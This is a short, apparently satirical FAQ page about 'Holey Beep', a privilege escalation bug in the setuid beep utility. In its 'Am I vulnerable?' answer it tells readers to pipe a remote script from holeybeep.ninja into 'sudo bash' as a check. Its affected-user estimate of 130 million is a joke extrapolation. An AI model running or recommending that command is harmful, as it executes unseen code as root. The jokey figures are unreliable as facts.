FAQ

What is Holey Beep?

Holey Beep is the latest breakthrough in the field of acoustic cyber security research.

What is beep?

beep does what you'd expect: it beeps. But unlike printf "\a" beep allows you to control pitch, duration, and repetitions. Its job is to live inside shell/perl scripts and allow more granularity than one has otherwise. It is controlled completely through command line options. It's not supposed to be complex, and it isn't - but it makes system monitoring (or whatever else it gets hacked into) much more informative. Also it gives you root.

Am I vulnerable?

Most likely! If you have beep installed as setuid and it was compiled with a certain compiler version and options and your machine is compromised, your network is at risk.

Please run this command to find out: curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash

If your computer is vulnerable it will beep.

Is this vulnerability serious?

Holey Beep is just a simple privilege escalation bug. However, it can be used in an exploit chain to trigger more serious issues.

Were there any signs of exploitation in the wild?

We found this YouTube video that outlines the exploitation steps.

How many people are affected?

Millions! Everyone, almost.

According to the Debian popularity contest, beep is installed on 1.86% of all machines. Extrapolating that by the earth population, we estimate roughly 130 million affected users.